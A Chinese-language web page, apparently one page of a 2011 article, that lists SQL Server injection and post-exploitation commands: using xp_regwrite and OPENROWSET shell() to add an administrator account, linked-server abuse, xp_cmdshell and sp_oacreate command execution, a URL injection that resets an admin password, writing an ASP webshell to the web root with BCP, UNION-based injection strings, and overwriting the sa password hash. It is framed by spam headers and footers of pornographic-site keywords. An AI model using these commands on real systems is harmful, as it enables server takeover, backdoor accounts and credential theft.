变态重口极致另类在线-波多久久夜色精品国产-波多野结衣在线观看一区-波多野结衣在线观看一区二区-污污的网站免费阅读-污污视频网址

當前位置:首頁文章首頁 IT學院 IT技術

比較全的SQL注入相關的命令分享

作者:  來源:  發布時間:2011-6-15 15:18:23  點擊:
出于安全原因,默認沙盤模式未開啟,這就是為什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER權限,為了方便,這里建議使用sysadmin權限測試:
   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:
0   禁止一切(默認)
1   使能訪問ACCESS,但是禁止其它
2   禁止訪問ACCESS,但是使能其他
3   使能一切

   這里僅給出sysadmin權限下使用的命令:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


   建立鏈接數據庫'L0op8ack'參考命令:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

   如何使用鏈接數據庫:

使用這個方式可以執行,但是很不幸,DB_OWNER權限是不夠的,需要至少sysadmin權限或者securityadmin+setupadmin權限組合
sp_addlinkedserver需要sysadmin或setupadmin權限
sp_addlinkedsrvlogin需要sysadmin或securityadmin權限
最終發現,還是sa權限或者setupadmin+securityadmin權限帳戶才能使用,
一般沒有哪個管理員這么設置普通帳戶權限的

實用性不強,僅作為一個學習總結吧

大致過程如下,如果不是sysadmin,那么IAS.mdb權限驗證會出錯,
我測試的時候授予hacker這個用戶setupadmin+securityadmin權限,使用ias.mdb失敗
需要找一個一般用戶可訪問的mdb才可以:

   新建鏈接服務器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
   exec sp_addlinkedsrvlogin 'L0op8ack','false';--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
   exec sp_dropserver 'L0op8ack';--

再考貝一個其它文件來代替7.18日文件:
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9、   用UPDATE來更新表中的數據:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www用戶密碼的16位MD5值為:a0b923820dcc509a,即把密碼改成1;
32位MD5值為:   ,密碼為

10、   利用表內容導成文件功能
SQL有BCP命令,它可以把表的內容導成文本文件并放到指定位置。利用這項功能,我們可以先建一張臨時表,然后在表中一行一行地輸入一個ASP木馬,然后用BCP命令導出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'參數為執行查詢的服務器,'U'參數為用戶名,'P'參數為密碼,最終上傳了一個runcommand.asp的木馬)。

11、創建表、播入數據和讀取數據的方法
   創建表:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
   往表里播入數據:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
   從表里讀取數據:
' and 1=(select count(*) from cyfd where gyfd >1)--

   刪除臨時表:
';drop table cyfd;--

12、通過SQL語句直接更改sa的密碼:
   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,這樣sa的密碼就被我們改成了111111拉。
首頁 上一頁 [1] [2] [3] [4] [5]  下一頁 尾頁

相關軟件

相關文章

文章評論

軟件按字母排列: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
主站蜘蛛池模板: 成年午夜影片免 | 国产一级视频免费 | 1717she精品国产真正免费 | 婷婷在线免费观看 | 国产精品免费一区二区三区 | 成人在线激情网 | 国产高清在线精品一区a | 亚洲码专区| www.黄色网址 | 一区二区三区四区国产 | 一级片免费播放 | 日本欧美小视频 | 看黄免费网站 | 男人的天堂色偷偷之色偷偷 | 华人欧美国产在线精品 | 性欧美高清另类videoso | 久久青草免费免费91线频观看 | 国产欧美日韩精品专区 | 中文字幕在线观看一区二区三区 | 狠狠色丁香婷婷综合精品视频 | 国产色手机在线观看播放 | 手机在线资源 | 欧美一区二区亚洲 | 一级做一级爱a做片性视频视频 | 亚洲第二页 | 在线视频第一页 | 国产精品欧美亚洲韩国日本99 | 黄色片免费在线播放 | 天天干天天干天天操 | 亚洲一区二区黄色 | 日韩每日更新 | 欧美成人精品三级网站 | 综合免费视频 | 成人手机在线观看 | 狠狠色成色综合网 | 麻豆国产视频 | 视频一区 欧美 | 欧美美女被爆操 | 700av第一福利在线导航 | 免费网站看v片在线播放器 免费无毒片在线观看 | 91短视频在线观看手机 |